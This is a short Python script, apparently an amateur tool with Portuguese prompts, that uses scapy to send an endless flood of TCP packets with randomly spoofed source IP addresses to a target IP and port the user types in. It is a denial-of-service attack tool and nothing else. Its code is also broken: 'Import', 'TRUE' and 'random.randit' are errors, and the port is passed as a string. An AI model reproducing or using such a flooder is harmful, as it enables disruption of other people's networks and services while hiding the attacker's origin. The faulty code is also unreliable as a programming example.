from scapy.all import *
Import random 

ip = input("Digite o IP do alvo: ")
porta = input("Digite a porta do alvo: ")
n_pacote = 1

while TRUE:
 w = str(random.randit(0, 254))
 x = str(random.randit(0, 254))
 y = str(random.randit(0, 254))
 z = str(random.randit(0, 254))
 
 local = w + "." + x + "." + y + "." + z
 pacote_ip = IP(src = local, dst = ip)
 pacote_tcp = TCP(sport = 443, dport = porta)
 pacote = pacote_ip / pacote_tcp
 send(pacote, inter = .001)
 if n_pacote % 100 == 0:
  print("Pacotes Enviados", n_pacote)
 n_pacote += 1
